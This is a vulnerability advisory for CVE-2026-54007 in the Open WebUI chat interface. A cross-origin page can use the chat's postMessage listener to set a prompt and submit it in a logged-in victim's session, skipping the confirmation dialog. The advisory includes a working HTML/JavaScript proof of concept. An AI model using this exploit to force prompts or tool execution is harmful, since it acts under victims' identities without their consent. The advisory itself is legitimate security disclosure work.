PT-2026-50479 · Pypi · Open-Webui

Published

2026-06-17

·

Updated

2026-06-17

·

CVE-2026-54007

CVSS v4.0

7.1

High

VectorAV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N

Summary

The chat message listener allows non-same-origin input:prompt and action:submit messages, so an external site can set prompt text and trigger submitPrompt() in an authenticated victim session. I validated this with a cross-origin attacker page that auto-posted messages and caused unauthorized POST /api/v1/chats/new and POST /api/chat/completions requests containing attacker-controlled prompts. This enables cross-site forced actions and model/tool execution under victim privileges without consent.

Details

The chat page's window message listener in src/lib/components/chat/Chat.svelte processes message types including input:prompt and action:submit without adequately enforcing same-origin restrictions. Based on code around lines ~597-616, input text is set directly from event.data.text; action:submit proceeds to submitPrompt() on the current prompt. The logic does not apply a strict origin allowlist and permits non-same-origin control of the chat input and submission flow, leading to cross-origin command execution in the victim's authenticated UI context. As a result, backend API calls (e.g., POST /api/v1/chats/new, POST /api/chat/completions) are sent under victim credentials.
Normally, via the input:prompt:submit postMessage type, this results in a "Confirm Prompt from Embed" confirmation dialog:
https://github.com/open-webui/open-webui/blob/9bd84258d09eefe7bf975878fb0e31a5dadfe0f8/src/lib/components/chat/Chat.svelte#L604-L622
However, combining the two other types, it is possible to achieve the same effect without this confirmation:
https://github.com/open-webui/open-webui/blob/9bd84258d09eefe7bf975878fb0e31a5dadfe0f8/src/lib/components/chat/Chat.svelte#L584-L602

PoC

  1. Set up a local Open WebUI instance and log in to it, making sure a model is configured
  2. Host the following HTML anywhere and visit it (optionally change http://127.0.0.1:14000 to your instance Base URL):
html
<h1>Click anywhere</h1>
<script>
 function sleep(ms) {
  return new Promise(r => setTimeout(r, ms));
 }
 
 onclick = async () => {
  w = window.open('http://127.0.0.1:14000');
  await sleep(2000);
  w.postMessage({ type: 'input:prompt', text: "INJECTED PROMPT" }, '*');
  await sleep(500);
  w.postMessage({ type: 'action:submit' }, '*');
 }
</script>
  1. Click anywhere on the page, then notice without further interaction the "INJECTED PROMPT" is executed on the Open WebUI instance
image

Impact

Conditions required: The victim must be authenticated to Open WebUI in the browser (token cookie present).
This issue enables cross-site forced actions under the victim's identity. An attacker can silently inject prompts and trigger model/tool execution (e.g., code interpreter, web search, retrieval, terminal/tool servers) as the victim without confirmation.

Original Agent Report

app aikido dev ai-pentests projects 116389 assessments 019d67d4-81c8-7dd2-bb9e-0a4a774b2c78 issues sidebarIssue=20439940 (4)

Fix

Origin Validation Error

Found an issue in the description? Have something to add? Feel free to write us 👾
dbugs@ptsecurity.com

Weakness Enumeration

CWE-346

Related Identifiers

CVE-2026-54007
GHSA-3VV5-8XXP-4F55

Affected Products

Open-Webui